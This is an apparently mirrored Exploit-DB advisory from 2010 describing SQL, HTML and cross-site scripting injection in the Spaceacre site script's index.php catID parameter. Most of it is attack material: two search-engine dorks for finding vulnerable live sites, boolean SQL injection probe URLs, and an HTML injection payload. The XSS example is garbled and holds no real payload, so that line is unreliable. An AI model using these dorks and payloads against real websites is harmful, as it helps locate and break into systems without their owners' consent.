Spaceacre – ‘/index.php’ SQL Injection / HTML / Cross-Site Scripting Injection

  • 作者: CoBRa_21
    日期: 2010-05-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12756/
  • -------------------------------------------------------------------------------------------
    
    Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability
    
    -------------------------------------------------------------------------------------------
    
    Author: CoBRa_21
    
    Script Home: http://www.spaceacre.com
    
    Dork 1: inurl:cat1.php?catID= "Spaceacre"
    
    Dork 2: intext:"Designed by Spaceacre"
    
    -------------------------------------------------------------------------------------------
    
    SQL Injection:
    
    http://localhost/[path]/index.php?catID=1 and 1=2
    http://localhost/[path]/index.php?catID=1 and 1=1
    -------------------------------------------------------------------------------------------
    
    HTML Injection:
    
    http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.
    
    -------------------------------------------------------------------------------------------
    
    XSS Injection:
    
    http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.
    
    -------------------------------------------------------------------------------------------